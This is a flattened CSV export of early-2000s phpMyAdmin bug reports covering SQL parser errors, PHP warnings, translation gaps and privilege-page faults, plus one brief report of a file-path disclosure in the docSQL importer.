When typing amp;quot;SELECT EXTRACT YEAR MONTH FROM CURDATE )) amp;quot; phpma suffixes amp;quot;LIMIT 0,30 amp;quot; and this causes a mysql error.
Original URL https sourceforge.net p phpmyadmin bugs 706 https sourceforge.net p phpmyadmin bugs 706 Original author anonymous Found in version 2.3.3 pl1","bug"
"24444","7076","2.4.0 dev) Wrong back link after MySQL error.
Edit a row, change the primary to force a duplicate key error.
On the duplicate key error page, click Back.
Original URL https sourceforge.net p phpmyadmin bugs 707 https sourceforge.net p phpmyadmin bugs 707 Original author lem9","bug"
"24444","7077","2.3.3pl1) ALTER table contains extra, buggy sql.
While altering a table to change the field name I got amp;gt; amp;gt; Database csi Table csiusers running on localhost Error SQL query ALTER TABLE `csiusers` CHANGE `real name` `first name` CHAR 255 ) NOT NULL , CHANGE `real name` `first name` CHAR 255 ) NOT NULL MySQL said Unknown column real name in csiusers amp;lt; amp;lt; I am running phpMyAdmin 2.3.3pl1, PHP 4.2.3, MySQL 3.23.53, and Apache 2.0.43.
I have read the changelog phpmyadmin.net, and searched through the bug reports and user forum, but I have no clue.
I can copy the SQL and enter it as an SQL statement removing the duplicate amp;quot;, CHANGE ... amp;quot; and it works.
This also happens when I add a field to a table or anything that ALTERs the table.
Please advise.
Wes Yates Original URL https sourceforge.net p phpmyadmin bugs 708 https sourceforge.net p phpmyadmin bugs 708 Original author gmac63 Found in version 2.3.3 pl1","bug"
"24444","7078","2.3.3 pl1) DATE ADD function parsed wrong.
The following SQL statement fails using pma 2.3.3pl1, but works using 2.2.0 SELECT DATE ADD submitted time, INTERVAL 10 YEAR ) AS ten years from subtime FROM job 2.3.3pl1 concatenates the INTERVAL with the 10 like this INTERVAL10.
Hope this helps, Joe Original URL https sourceforge.net p phpmyadmin bugs 709 https sourceforge.net p phpmyadmin bugs 709 Original author anonymous Found in version 2.3.3 pl1","bug"
"24444","7079","2.3.3 pl1) Alter Table Problem.
I ve found a problem with the following statement ALTER TABLE tbl name AUTO INCREMENT = 1 The space between tbl name and AUTO INCREMENT is being removed by the parser thus resulting in a MySQL error.
The statement appears like this ALTER TABLE menu.invoicesAUTO INCREMENT = 1 With the error You have an error in your SQL syntax near = 1 at line 1 Cheers Andy Woolley Milonic Solutions Original URL https sourceforge.net p phpmyadmin bugs 710 https sourceforge.net p phpmyadmin bugs 710 Original author anonymous Found in version 2.3.3 pl1","bug"
"24444","7080","2.3.2) amp;quot;UNSIGNED amp;quot; option in SET or ENUM.
I found a bug in phpmyadmin 2.3.2 when you try to create or change values from a amp;quot;SET amp;quot; or amp;quot;ENUM amp;quot; column.
This bug will be found if you use the value amp;quot;UNSIGNED amp;quot; in any of these columns.
It seemed as if the mysql string is parsed and the string amp;quot;UNSIGNED amp;quot; is removed from the SET or ENUM values and is placed as attribute for this column.
If you use the same mysql string in a mysql prompt there will be no problems.
So I think there will be a problem with phpmyadmin.
Greetings Thomas Original URL https sourceforge.net p phpmyadmin bugs 711 https sourceforge.net p phpmyadmin bugs 711 Original author anonymous Found in version 2.3.2","bug"
"24444","7081","2.3.3 pl1) db details importdocsql.php3 is untranslated.
In db details importdocsql.php3 there are plenty hardcoded english texts...
Original URL https sourceforge.net p phpmyadmin bugs 712 https sourceforge.net p phpmyadmin bugs 712 Original author nijel Found in version 2.3.3 pl1","bug"
"24444","7082","Security docSQL importer path explorer.
The docSQL importer available off the database main page asks for a complete path to import a file.
It defaults to the SERVER [ DOCUMENT ROOT ] directory where possible.
Try feed it another path in your system, etc for example, and see how it exposes what files exist in that directory.
Original URL https sourceforge.net p phpmyadmin bugs 713 https sourceforge.net p phpmyadmin bugs 713 Original author robbat2 Found in version 2.3.3 pl1","bug"
"24444","7083","2.3.3pl1) Hardcoded strings in libraries relation.lib.php3.
libraries relation.lib.php3 contains hardcoded strings.
Lines 161 200.
At the start of each error check.
Original URL https sourceforge.net p phpmyadmin bugs 714 https sourceforge.net p phpmyadmin bugs 714 Original author robbat2 Found in version 2.3.3 pl1","bug"
"24444","7084","2.3.3 pl1) safari wrong behavior.
be careful osX users, do not edit mysql tables with Safari as it will change all special characters to a amp;quot;?
amp;quot; value...Apple need to fix that, no issue with chimera, netscape or mozilla...
Original URL https sourceforge.net p phpmyadmin bugs 715 https sourceforge.net p phpmyadmin bugs 715 Original author anonymous Found in version 2.3.3 pl1","bug"
"24444","7085","2.3.3 pl1) fields to uppercase in CREATE TABLE.
Version 2.3.3pl1 and 2.4.0 DEV change field names like password and type in lower case ) into upper case when i use type in my own CREATE TABLE query.
Original URL https sourceforge.net p phpmyadmin bugs 716 https sourceforge.net p phpmyadmin bugs 716 Original author an13810 Found in version 2.3.3 pl1","bug"
"24444","7086","Sorting by a column removes referential links.
When referential links are used, sorting by a column removes the links that should be created by the referential column.
Example tblA.col1 is referenced to tblB.col2.
When browsing tblB, the links show up correctly.
However, if I sort by any field in tblB, the links disappear.
Please email gms8994 dp.cx for more information, and or examples.
Original URL https sourceforge.net p phpmyadmin bugs 717 https sourceforge.net p phpmyadmin bugs 717 Original author anonymous Found in version 2.3.0","bug"
"24444","7087","installation procedure warning.
I suggest the installation instructions warn the user against copying an already installed phpmyadmin setup to a new server.
I did this, and changed configinc.php, but still got some very weird behaviour, particularly in that i could not see my own database, but one of a totally different user.
I reported this to my ISP as a problem, but decided to do a fresh install with a correct configinc.php, which totally solved this problem.
Of course, what i did was stupid.
mark.richards massmicro.com Original URL https sourceforge.net p phpmyadmin bugs 718 https sourceforge.net p phpmyadmin bugs 718 Original author anonymous Found in version 2.3.3 pl1","bug"
"24444","7088","2.4.0 dev) Normal user not able to change his her password.
Normal user who has only USAGE global privileges is not able to change his her password.
User will get following error message if he she tries to change password trough the Change Password pages in phpMyAdmin.
Error SQL query SET PASSWORD = PASSWORD ) MySQL said Access denied for user user 127.0.0.1 to database mysql This functionality worked just fine with mysql 3.23.54.
Teemu windows 2000, mysql 4.0.9, php 2.3.0., phpmyadmin 2.4.0 dev Original URL https sourceforge.net p phpmyadmin bugs 719 https sourceforge.net p phpmyadmin bugs 719 Original author kuulasma Found in version 2.4.0 rc1","bug"
"24444","7089","Duplicate column name.
however I create the Table, it generates the error like below Error SQL query CREATE TABLE `test` `id` INT NOT NULL , `id` INT NOT NULL , PRIMARY KEY `id` ) ) MySQL said Duplicate column name id Original URL https sourceforge.net p phpmyadmin bugs 720 https sourceforge.net p phpmyadmin bugs 720 Original author anonymous","bug"
"24444","7090","2.4.0 dev) Parser and umlauts.
Parser chokes on CREATE TABLE gae config mahngebxc3xbchr1 int 3) NOT NULL default 0 ) TYPE=MyISAM I know that the field name should be enclosed with backticks to be valid for MySQL.
Original URL https sourceforge.net p phpmyadmin bugs 721 https sourceforge.net p phpmyadmin bugs 721 Original author lem9 Found in version 2.3.3 pl1","bug"
"24444","7091","parser bugreport bug o).
When the parser displays a bug report e.g.
like the one Marc has just reported), it starts the output before the headers are sent!
As a consequence of this, I get several header warnings and two notices about ob flush ) Notice ob flush ) [ref.outcontrol] failed to flush buffer.
No buffer to flush.
in D \Webserver\phpMyAdmin\libraries\sqlparser.lib.php3 on line 174 The strange thing here is that I do not use output buffering at all... Windows NT 5.1 Apache 2.0.44 PHP 4.3.1 dev Original URL https sourceforge.net p phpmyadmin bugs 722 https sourceforge.net p phpmyadmin bugs 722 Original author rabus Found in version 2.3.3 pl1","bug"
"24444","7092","strange double inserts in smalltext fields.
2.4.0RC 1 latest snapshot, and normal 2.4.0RC 1 When updating an smalltext field, with more then 1000 characters, the date gets inserted randomly for the second time.
Example b amp;gt;Unie van Utrecht amp;lt; b amp;gt; amp;lt;p amp;gt; De provincies in ons land hebben een geschiedenis die teruggaat tot 1579.
Op 23 januari van dat jaar sloten zeven provincies de Unie van Utrecht.
Daarmee ontstond feitelijk de Republiek der Zeven Verenigde Provincixc3xabn.
De Unie was eigenlijk alleen een defensieverbond.
Gemeenschappelijk waren alleen het leger en de vloot, een regeling om de kosten daarvan te verdelen en een Raad van State om gebieden te besturen die niet tot de zeven provincies behoorden.
Verder kende de Unie de Staten Generaal; het overleg van afgevaardigden van de zeven verschillende Provinciale Staten.
Nog altijd heet ons parlement Eerste en Tweede Kamer) officieel de Staten Generaal.
Dat de leden van de Eerste Kamer worden gekozen door de leden van Provinciale Staten is ook een overblijfsel uit die tijd.
amp;lt;p amp;gt; amp;lt;b amp;gt;Bataafse Republiek amp;lt; b amp;gt; amp;lt;p amp;gt; Met de komst van Napoleon in 1795 kwam er een einde aan de Unie van Utrecht en de macht van de provincies.
Napoleon vestigde de Bataafse Republiek waardoor een eenheidsstaat was ontstaan met een centraal gezag.
De provincies verloren hun zelfstandigheid en dienden alleen nog als administratief lichaam dat onder strikt toezicht stond van het centrale gezag.
Uiteraard stond deze nieuwe republiek sterk onder invloed van Frankrijk.
Naarmate deze invloed groter werd, mocht zelfs het woord provincie niet meer gebruikt worden; de provincies heetten toen departementen.
amp;lt;p amp;gt; amp;lt;b amp;gt;Koninkrijk der Nederlanden amp;lt; b amp;gt; amp;lt;p amp;gt; In 1813 verloor Napoleon zijn positie en de Nederlandse soevereiniteit keerde terug.
Hoewel de nieuwe grondwet van 1814 wel de oude provinciale indeling herstelde bl een defensieverbond.
Gemeenschappelijk waren alleen het leger en de vloot, een regeling om de kosten daarvan te verdelen en een Raad van State om gebieden te besturen die niet tot de zeven provincies behoorden.
Verder kende de Unie de Staten Generaal; het overleg van afgevaardigden van de zeven verschillende Provinciale Staten.
Nog altijd heet ons parlement Eerste en Tweede Kamer) officieel de Staten Generaal.
Dat de leden van de Eerste Kamer worden gekozen door de leden van Provinciale Staten is ook een overblijfsel uit die tijd.
amp;lt;p amp;gt; will get inserted as amp;lt;b amp;gt;Unie van Utrecht amp;lt; b amp;gt; amp;lt;p amp;gt; De provincies in ons land hebben een geschiedenis die teruggaat tot 1579.
Op 23 januari van dat jaar sloten zeven provincies de Unie van Utrecht.
Daarmee ontstond feitelijk de Republiek der Zeven Verenigde Provincixc3xabn.
De Unie was eigenlijk alleen een defensieverbond.
Gemeenschappelijk waren alleen het leger en de vloot, een regeling om de kosten daarvan te verdelen en een Raad van State om gebieden te besturen die niet tot de zeven provincies behoorden.
Verder kende de Unie de Staten Generaal; het overleg van afgevaardigden van de zeven verschillende Provinciale Staten.
Nog altijd heet ons parlement Eerste en Tweede Kamer) officieel de Staten Generaal.
Dat de leden van de Eerste Kamer worden gekozen door de leden van Provinciale Staten is ook een overblijfsel uit die tijd.
amp;lt;p amp;gt; amp;lt;b amp;gt;Bataafse Republiek amp;lt; b amp;gt; amp;lt;p amp;gt; Met de komst van Napoleon in 1795 kwam er een einde aan de Unie van Utrecht en de macht van de provincies.
Napoleon vestigde de Bataafse Republiek waardoor een eenheidsstaat was ontstaan met een centraal gezag.
De provincies verloren hun zelfstandigheid en dienden alleen nog als administratief lichaam dat onder strikt toezicht stond van het centrale gezag.
Uiteraard stond deze nieuwe republiek sterk onder invloed van Frankrijk.
Naarmate deze invloed groter werd, mocht zelfs het woord provincie niet meer gebruikt worden; de provincies heetten toen departementen.
amp;lt;p amp;gt; amp;lt;b amp;gt;Bataafse Republiek amp;lt; b amp;gt; amp;lt;p amp;gt; Met de komst van Napoleon amp;lt;b amp;gt;Koninkrijk der Nederlanden amp;lt; b amp;gt; amp;lt;p amp;gt; In 1813 verloor Napoleon zijn positie en de Nederlandse soevereiniteit keerde terug.
Hoewel de nieuwe grondwet van 1814 wel de oude provinciale indeling herstelde bl een defensieverbond.
Gemeenschappelijk waren alleen het leger en de vloot, een regeling om de kosten daarvan te verdelen en een Raad van State om gebieden te besturen die niet tot de zeven provincies behoorden.
Verder kende de Unie de Staten Generaal; het overleg van afgevaardigden van de zeven verschillende Provinciale Staten.
Nog altijd heet ons parlement Eerste en Tweede Kamer) officieel de Staten Generaal.
Dat de leden van de Eerste Kamer worden gekozen door de leden van Provinciale Staten is ook een overblijfsel uit die tijd.
amp;lt;p amp;gt; in 1795 kwam er een einde aan de Unie van Utrecht en de macht van de provincies.
Napoleon vestigde de Bataafse Republiek waardoor een eenheidsstaat was ontstaan met een centraal gezag.
De provincies verloren hun zelfstandigheid en dienden alleen nog als administratief lichaam dat onder strikt toezicht stond van het centrale gezag.
Uiteraard stond deze nieuwe republiek sterk onder invloed van Frankrijk.
Naarmate deze invloed groter werd, mocht zelfs het woord provincie niet meer gebruikt worden; de provincies heetten toen departementen.
amp;lt;p amp;gt; amp;lt;b amp;gt;Koninkrijk der Nederlanden amp;lt; b amp;gt; amp;lt;p amp;gt; In 1813 verloor Napoleon zijn positie en de Nederlandse soevereiniteit keerde terug.
Hoewel de nieuwe grondwet van 1814 wel de oude provinciale indeling herstelde bl een defensieverbond.
Gemeenschappelijk waren alleen het leger en de vloot, een regeling om de kosten daarvan te verdelen en een Raad van State om gebieden te besturen die niet tot de zeven provincies behoorden.
Verder kende de Unie de Staten Generaal; het overleg van afgevaardigden van de zeven verschillende Provinciale Staten.
Nog altijd heet ons parlement Eerste en Tweede Kamer) officieel de Staten Generaal.
Dat de leden van de Eerste Kamer worden gekozen door de leden van Provinciale Staten is ook een overblijfsel uit die tijd.
Can this be solved ?
and how ?
Thanks Silvester van der Leer phpbugs serial.nl Original URL https sourceforge.net p phpmyadmin bugs 723 https sourceforge.net p phpmyadmin bugs 723 Original author silvestertje","bug"
"24444","7093","2.4.0 rc1) export to XML, save to file.
Undefined variable charset of file in ... tbl dump.php3 on line 248 Original URL https sourceforge.net p phpmyadmin bugs 724 https sourceforge.net p phpmyadmin bugs 724 Original author lem9 Found in version 2.4.0 rc1","bug"
"24444","7094","2.4.0 rc1) undefined index quot;db quot;.
welcome page database statistics drop database confirmation error Notice Undefined index db in ..\libraries\common.lib.php on line 1133 Apache 2.0.43 Win32) PHP 4.3.0 MySQL 3.23.54 nt Win98SE Original URL https sourceforge.net p phpmyadmin bugs 725 https sourceforge.net p phpmyadmin bugs 725 Original author mandabaer Found in version 2.4.0 rc1","bug"
"24444","7095","2.4.0 rc1) pma changes case of field name.
Taken directly from the documentation CREATE TABLE `PMA column comments` id int 5) unsigned NOT NULL auto increment, db name varchar 64) NOT NULL default , table name varchar 64) NOT NULL default , column name varchar 64) NOT NULL default , comment varchar 255) NOT NULL default , PRIMARY KEY id), UNIQUE KEY db name db name, table name, column name) ) TYPE=MyISAM COMMENT= Comments for Columns ; pma changes the unquoted comment field name to upper case.
This is also true for unquoted field names likes type and myisam .
If those field names are quoted, they won t be converted to upper case.
Tested using phpMyAdmin 2.4.0 rc1, Apache 1.3.24, PHP 4.2.0, MySQL 3.23.49 nt on WindowsXP SP1.
Original URL https sourceforge.net p phpmyadmin bugs 726 https sourceforge.net p phpmyadmin bugs 726 Original author ci dev Found in version 2.4.0 rc1","bug"
"24444","7096","2.4.0 rc1) Icons in left pane.
Just a cosmetic flaw with cfg[ LeftFrameLight ] = FALSE; amp;quot;minus amp;quot; icons in the collapsible menue are not working mozilla 1.2.1 on win98) Original URL https sourceforge.net p phpmyadmin bugs 727 https sourceforge.net p phpmyadmin bugs 727 Original author mandabaer Found in version 2.4.0 rc1","bug"
"24444","7097","2.4.0 rc1) lower case table names faq error.
I just read the FAQ section 1.23.
The instruction there don t work for MySQL 3.23.49 nt on Windows XP SP1 as service.
It simply won t start.
Setting the proper value via set variable=lower case table names=0 works fine.
Original URL https sourceforge.net p phpmyadmin bugs 728 https sourceforge.net p phpmyadmin bugs 728 Original author ci dev Found in version 2.4.0 rc1","bug"
"24444","7098","RTL languages not fully supported.
RTL languages have broken display in database dropdown displays amp;quot; test 10 amp;quot; instead of amp;quot; 10) test amp;quot; Confirmed for Arabic and Hebrew.
Original URL https sourceforge.net p phpmyadmin bugs 729 https sourceforge.net p phpmyadmin bugs 729 Original author robbat2 Found in version Latest Git","bug"
"24444","7099","2.4.0 rc1) ChineseGB UTF8 broken.
lang chinese gb utf 8.inc.php3 is broken.
looks like a recode iconv error Recode output chinese gb [charset gb2312] to utf 8...recode Invalid input in step `EUC CN..UTF 8 done chinese gb processing finished.
Iconv output chinese gb [charset gb2312] to utf 8...iconv illegal input sequence at position 1879 done chinese gb processing finished.
Original URL https sourceforge.net p phpmyadmin bugs 730 https sourceforge.net p phpmyadmin bugs 730 Original author robbat2 Found in version 2.4.0 rc1","bug"
"24444","7100","2.4.0 rc2) Error when adding user unneeded field upload).
Hi!
I upgraded from phpmyadmin 2.x to 4.x and in rc2 i still have the error.
When i select DB mysql, goto table db and add a new entry there i get Warning fopen amp;quot;none amp;quot;, amp;quot;rb amp;quot;) No such file or directory in home www web01000 html phpmyadmin.new tbl repla ce fields.php on line 12 Warning stat failed for none errno=2 No such file or directory) in home www web01000 html phpmyadmin.new tbl repla ce fields.php on line 12 Warning Supplied argument is not a valid File Handle resource in home www web01000 html phpmyadmin.new tbl repla ce fields.php on line 12 Warning fopen amp;quot;none amp;quot;, amp;quot;rb amp;quot;) No such file or directory in home www web01000 html phpmyadmin.new tbl repla ce fields.php on line 12 Warning stat failed for none errno=2 No such file or directory) in home www web01000 html phpmyadmin.new tbl repla ce fields.php on line 12 Warning Supplied argument is not a valid File Handle resource in home www web01000 html phpmyadmin.new tbl repla ce fields.php on line 12 Warning fopen amp;quot;none amp;quot;, amp;quot;rb amp;quot;) No such file or directory in home www web01000 html phpmyadmin.new tbl repla ce fields.php on line 12 Warning stat failed for none errno=2 No such file or directory) in home www web01000 html phpmyadmin.new tbl repla ce fields.php on line 12 Warning Supplied argument is not a valid File Handle resource in home www web01000 html phpmyadmin.new tbl repla ce fields.php on line 12 Warning Cannot add header information headers already sent by output started at home www web01000 html phpmyadmin.new tbl repl ace fields.php 12) in home www web01000 html phpmyadmin.new libraries ob.lib.php on line 65 Warning Cannot add header information headers already sent by output started at home www web01000 html phpmyadmin.new tbl repl ace fields.php 12) in home www web01000 html phpmyadmin.new header.i nc.php on line 27 Warning Cannot add header information headers already sent by output started at home www web01000 html phpmyadmin.new tbl repl ace fields.php 12) in home www web01000 html phpmyadmin.new header.i nc.php on line 28 Warning Cannot add header information headers already sent by output started at home www web01000 html phpmyadmin.new tbl repl ace fields.php 12) in home www web01000 html phpmyadmin.new header.i nc.php on line 29 Warning Cannot add header information headers already sent by output started at home www web01000 html phpmyadmin.new tbl repl ace fields.php 12) in home www web01000 html phpmyadmin.new header.i nc.php on line 30 Warning Cannot add header information headers already sent by output started at home www web01000 html phpmyadmin.new tbl repl ace fields.php 12) in home www web01000 html phpmyadmin.new header.i nc.php on line 32 Error SQL query INSERT INTO `db` `Host` , `Db` , `User` , `Select priv` , `Insert priv` , `Update priv` , `Delete priv` , `Create priv` , `Drop priv` , `Grant priv` , `References priv` , `Index priv` , `Alter priv` ) VALUES 0x, 0x, 0x, N , N , N , N , N , N , N , N , N , N ) ; MySQL said Unknown column 0x in field list With 3.x this works just fine.
Perhaps i forgot something in my config ?
Original URL https sourceforge.net p phpmyadmin bugs 731 https sourceforge.net p phpmyadmin bugs 731 Original author anonymous","bug"
"24444","7101","2.3.0) Broken link to ALTER TABLE documentation.
The amp;quot;Documentation amp;quot; link show when creating an new index does not work.
On line 350 of tbl indexes.php, it says PMA showMySQLDocu Reference , ALTER TABLE.html ) This should be PMA showMySQLDocu Reference , ALTER TABLE ) Jack Levy Original URL https sourceforge.net p phpmyadmin bugs 732 https sourceforge.net p phpmyadmin bugs 732 Original author jacklevy Found in version 2.3.0","bug"
"24444","7102","2.4.0 rc2) MySQL3 wrong record count COUNT, GROUP BY).
I enabled Show all button in config file and it will correctly show up when browsing a table using Browser tab.
But when using a stored query SQL bookmark) this button simply isn t there.
Original URL https sourceforge.net p phpmyadmin bugs 733 https sourceforge.net p phpmyadmin bugs 733 Original author ci dev Found in version 2.4.0 rc2","bug"
"24444","7103","2.4.0 rc1) Show button not working when using bookmarks.
The Show button of the record set navigation doesn t work after using a bookmark AND JavaScript is enabled.
It always says x is not a valid row number regardless of the value of x even 0 is invalid.
But after turning JavaScript off, it works as expected.
Tested with phpMyAdmin 2.4.0 rc1 and IE 6.0 SP 1 and Opera 6.05 under Windows XP SP1.
Original URL https sourceforge.net p phpmyadmin bugs 734 https sourceforge.net p phpmyadmin bugs 734 Original author ci dev Found in version 2.4.0 rc1","bug"
"24444","7104","2.4.0 rc1) Font size in Konqueror too small.
Compared to other Browsers like IE on WIndows the default font size used for Konqueror in phpMyAdmin is too small.
Currently the else case in the function PMA setFontSizes ) is used for Konqueror applying the following sizes font size = small ; font biggest = large ; font bigger = medium ; font smaller = x small ; font smallest = x small ; I think there should be a new elseif for Konqueror with the following font sizes font size = medium ; font biggest = x large ; font bigger = large ; font smaller = small ; font smallest = small ; Original URL https sourceforge.net p phpmyadmin bugs 735 https sourceforge.net p phpmyadmin bugs 735 Original author anonymous Found in version 2.4.0 rc1","bug"
"24444","7105","Datetime order bug.
When you click on a heading that is a amp;quot;datetime amp;quot; type, so as to order the table by that value, an incorrect result is produced.
Because the query becomes select from table order by made at something strange happens.
It works correctly without the quotes, i.e.
select from table order by made at I might have missed a config option but to basic users it s a bit inconvenient.
Are the quotes really necessary at all?
Original URL https sourceforge.net p phpmyadmin bugs 736 https sourceforge.net p phpmyadmin bugs 736 Original author wapocalypse","bug"
"24444","7106","Duplicate fields creating altering tables.
When I try to add table using phpmyadmin I get an error.
I use apache 2.0.40 php 4.2.2 mysql 3.23.53 on RH8 and PhpMyAdmin 2.4 latest).
For example, suppose I wish add this table t1 with fields f1 int) and f2 varchar 10)) Script should look like create table t1 f1 int, f2 varchar 10) ) But output script generated by PhpMyAdmin looks like this create table t1 f1 int, f2 varchar 10) f1 int, f2 varchar 10) ).
Why fileds are duplicated?
Original URL https sourceforge.net p phpmyadmin bugs 737 https sourceforge.net p phpmyadmin bugs 737 Original author max20571 Found in version 2.4.0","bug"
"24444","7107","Table export not assigning default value for type text.
Very minor glitch in otherwise very nice export routine Used on windows ME, but I don t think this is platform related) When attempting to export this CREATE TABLE `error` `ID` int 10) unsigned NOT NULL auto increment, `dateOccurred` int 10) unsigned default NULL, `message` text default NULL, `mode` varchar 30) default NULL, `sessionID` varchar 13) default NULL, `severity` int 10) unsigned default NULL, `submode` varchar 30) NOT NULL default tba , `type` int 10) unsigned default NULL, PRIMARY KEY `ID`) ) TYPE=MyISAM; Actually sends this CREATE TABLE `error` `ID` int 10) unsigned NOT NULL auto increment, `dateOccurred` int 10) unsigned default NULL, `message` text, `mode` varchar 30) default NULL, `sessionID` varchar 13) default NULL, `severity` int 10) unsigned default NULL, `submode` varchar 30) NOT NULL default tba , `type` int 10) unsigned default NULL, PRIMARY KEY `ID`) ) TYPE=MyISAM; Note absense of default value for the field message) Original URL https sourceforge.net p phpmyadmin bugs 740 https sourceforge.net p phpmyadmin bugs 740 Original author classaxe Found in version 2.4.0 rc1","bug"
"24444","7108","SQL parser pretty printer, improve linebreaks.
The query amp;quot;SELECT `insertDate` INTERVAL 12 HOUR FROM `ut` amp;quot; is pretty printed in a wrong way as line breaks are unlogical.
Original URL https sourceforge.net p phpmyadmin bugs 738 https sourceforge.net p phpmyadmin bugs 738 Original author ci dev Found in version 2.4.0 rc1","bug"
"24444","7109","2.4.0 rc1) BLOB upload error.
when editing a record which has a blob field...the following errors are produced if blob field is left empty Warning fopen amp;quot;none amp;quot;, amp;quot;rb amp;quot;) No such file or directory in phpMyAdminv24 tbl replace fields.php on line 12 Warning Supplied argument is not a valid File Handle resource in phpMyAdminv24 tbl replace fields.php on line 12 Warning Unable to access none in phpMyAdminv24 tbl replace fields.php on line 12 It also wipes out exisiting blob field data.
Im not sure if this is by design ?
Original URL https sourceforge.net p phpmyadmin bugs 739 https sourceforge.net p phpmyadmin bugs 739 Original author jnoone Found in version 2.4.0 rc1","bug"
"24444","7110","2.4.0 rc1) Undefined variable.
Attempting to drop a database results in the following error Warning Undefined variable table in var www html phpMyAdmin sql.php on line 194 Original URL https sourceforge.net p phpmyadmin bugs 741 https sourceforge.net p phpmyadmin bugs 741 Original author anonymous Found in version 2.4.0 rc1","bug"
"24444","7111","2.4.0 rc1) uncheck all of privileges is broken.
On the privileges page the uncheck all link is broken.
It reads like http phpmyadmin phpMyAdmin 2.4.0 rc1 server privileges.phplang=en iso 8859 1 amp;amp;server=1 , i.e.
the question mark separating the parameter list is missing.
Original URL https sourceforge.net p phpmyadmin bugs 742 https sourceforge.net p phpmyadmin bugs 742 Original author ci dev Found in version 2.4.0 rc1","bug"
"24444","7112","2.4.0 rc1) Privileges Changing user host field.
The pages for creating managing MySQL user accounts changed significantly between 2.3.3 pl1 and 2.4.0 rc1...
I cannot find a way to change the allowed host for an already existing user account.
Can anyone tell me how it s possible without the need of modify the mysql tables myself?
Original URL https sourceforge.net p phpmyadmin bugs 743 https sourceforge.net p phpmyadmin bugs 743 Original author ci dev Found in version 2.4.0 rc1","bug"
"24444","7113","2.4.0 rc1) sql limit to append undefined.
Notice Undefined index sql limit to append in sql.php3 on line 505 Original URL https sourceforge.net p phpmyadmin bugs 744 https sourceforge.net p phpmyadmin bugs 744 Original author robbat2 Found in version 2.4.0 rc1","bug"
"24444","7114","2.4.0 rc1) fopen amp;quot;none amp;quot;) duplicate report.
After selecting an existing record from a table and selecting amp;quot;Add As New Record amp;quot; and submitting it, the following error occured Warning Unable to access none in home www web2 html mysql tbl replace fields.php on line 12 Warning fopen amp;quot;none amp;quot;, amp;quot;rb amp;quot;) No such file or directory in home www web2 html mysql tbl replace fields.php on line 12 Warning stat failed for none errno=2 No such file or directory) in home www web2 html mysql tbl replace fields.php on line 12 Warning Supplied argument is not a valid File Handle resource in home www web2 html mysql tbl replace fields.php on line 12 Warning Cannot add header information headers already sent by output started at home www web2 html mysql tbl replace fields.php 12) in home www web2 html mysql tbl replace.php on line 195 System Linux 2.4.18 SUSE 7.1) Apache 1.3.26 PHP 4.1.2 Safe Mode ON) MySQL 3.23.37 LOG have a lot of fun an continiue with this great project.
w regards Sebastian Kraus Bamberg, Germany email s.kraus moscher.com Original URL https sourceforge.net p phpmyadmin bugs 745 https sourceforge.net p phpmyadmin bugs 745 Original author anonymous Found in version 2.4.0 rc1","bug"
"24444","7115","2.4.0 rc1) bug with column comments.
Let s examine some scenario 1\.
Let s assume that there is a column named amp;quot;ABC amp;quot; in some table.
2\.
Lets add some comment to this amp;quot;ABC amp;quot;) column.
3\.
Then let s change name of this column from amp;quot;ABC amp;quot; to amp;quot;CBA amp;quot;.
4\.
Now the bug there is no visible comment for newly named column amp;quot;CBA amp;quot;, because old comment is amp;quot;remembered amp;quot; for column named amp;quot;ABC amp;quot;.
5\.
Altering back the name of column from amp;quot;CBA amp;quot; to amp;quot;ABC amp;quot; will affect returning the comment.
Best regards danielos dnguyen poczta.onet.pl Original URL https sourceforge.net p phpmyadmin bugs 746 https sourceforge.net p phpmyadmin bugs 746 Original author anonymous Found in version 2.4.0 rc1","bug"
"24444","7116","PMA tries to use the same login for all servers.
I ve set up one phpMyAdmin installation for 2 MySQL servers using the cookie or http authentification mode for both of them.
When switching from server 1 to server 2, phpMyAdmin tries to login with the same username password combination.
Imho, this should not be the correct behavior.
A workaround for the cookie mode would be that we store the usernames passwords for the different servers in seperate cookie variables.
This would also allow us to switch quickly between 2 or more servers.
Original URL https sourceforge.net p phpmyadmin bugs 747 https sourceforge.net p phpmyadmin bugs 747 Original author rabus Found in version 2.4.0","bug"
"24444","7117","getElementById error in IE 5.5.
The following bug has been around for a few weeks, and it is also in 2.4.0 rc2 that was released on Feb 14, 2003) When doing a query after a prior one, the code in libraries common.lib.php that contains getElementById produces an IE 5.5 error.
I think the fix is to put in the following line just prior to the last one starting with amp;amp; amp;amp; about 5 lines after the first occurrence of getelementById) amp;amp; amp;amp; window.parent.frames [ nav ].document.getElementById amp;lt;?php echo tbl .
md5 tbl; ?
amp;gt; ) Csaba Gabor, New York City Original URL https sourceforge.net p phpmyadmin bugs 748 https sourceforge.net p phpmyadmin bugs 748 Original author keringo Found in version 2.4.0 rc1","bug"
"24444","7118","2.4.0 rc2) Infinite loop in new amp;quot;Check Privileges amp;quot;.
If I click home databases check privileges on one of my databases, it lists the two users I have defined for that database, but then goes into an infinite loop printing table rows containing Any global USAGE No Edit Original URL https sourceforge.net p phpmyadmin bugs 749 https sourceforge.net p phpmyadmin bugs 749 Original author coolbru Found in version 2.4.0 rc2","bug"
"24444","7119","edit delete as buttons AND textlinks?.
Today I discovered a very strange phenomenon when browsing through one of my tables Some of the amp;quot;edit amp;quot; and amp;quot;delete amp;quot; options to the left of each table entry in the browse page where displayed as buttons, some as text links see screenshot in attached zip file).
This pages also takes very long to load though the server is on the local network.
I ve added a table dump and a screenshot to show the strange behaviour.
regards Matthias p.s.
I have phpMyAdmin 2.4.0 rc2 Original URL https sourceforge.net p phpmyadmin bugs 750 https sourceforge.net p phpmyadmin bugs 750 Original author anonymous Found in version 2.4.0 rc2","bug"
"24444","7120","2.4.0 rc2) Editing rows with BLOB columns.
I m having tables with BLOB colums, which contain binary file data.
I use the Browse... button to upload the data into the column, but when editing an existing record and not supplying a file for the column, results in an empty column with no data.
But I d like to keep the data as it is.
Original URL https sourceforge.net p phpmyadmin bugs 751 https sourceforge.net p phpmyadmin bugs 751 Original author mister x Found in version 2.4.0 rc2","bug"
"24444","7121","Can t edit priv.
when diff.
host in db and user.
I have any privileges for any users for test db.
The current privileges code doesn t allow me to modify this user it has empty name).
There are displayed no db specific privileges and trying to edit this user from database privileges I get just amp;quot;The selected user was not found in the privilege table.
amp;quot; Original URL https sourceforge.net p phpmyadmin bugs 752 https sourceforge.net p phpmyadmin bugs 752 Original author nijel Found in version 2.6.4 pl3","bug"
"24444","7122","2.4.0 rc2) Missing amp;quot;?
amp;quot; in database link.
In the Databases Overview there is one ?
missing in the link to the databases.
